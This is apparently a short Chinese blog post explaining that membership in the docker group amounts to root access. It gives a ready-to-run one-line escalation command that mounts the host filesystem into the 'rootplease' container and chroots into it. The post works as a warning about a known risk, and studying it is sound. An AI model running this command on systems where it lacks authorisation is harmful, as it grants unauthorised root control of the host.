关于docker提权
如果一个服务器有一个普通的用户,并且这个用户加入了docker组,则这个用户已经是root了。下面看具体操作
我创了一个用户,并且加入了docker组。
docker 组内用户执行命令的时候会自动在所有命令前添加 sudo。因为设计或者其他的原因,Docker 给予所有 docker 组的用户相当大的权力(虽然权力只体现在能访问 /var/run/docker.sock 上面)。
默认情况下,Docker 软件包是会默认添加一个 docker 用户组的。Docker 守护进程会允许 root 用户和 docker
组用户访问 Docker。给用户提供 Docker 权限和给用户无需认证便可以随便获取的 root 权限差别不大。
普通用户执行这条命令就可以获得root权限
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
分析
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
参数 -v 将容器外部的目录 / 挂载到容器内部 /hostOS
这个容器的启动脚本是 exploit.sh,主要内容是:chroot 到容器的 /hostOS (也就是宿主机的 /),然后获取到宿主机的 root 权限。
参考:openskill./article/21
更多推荐
用户组,docker
发布评论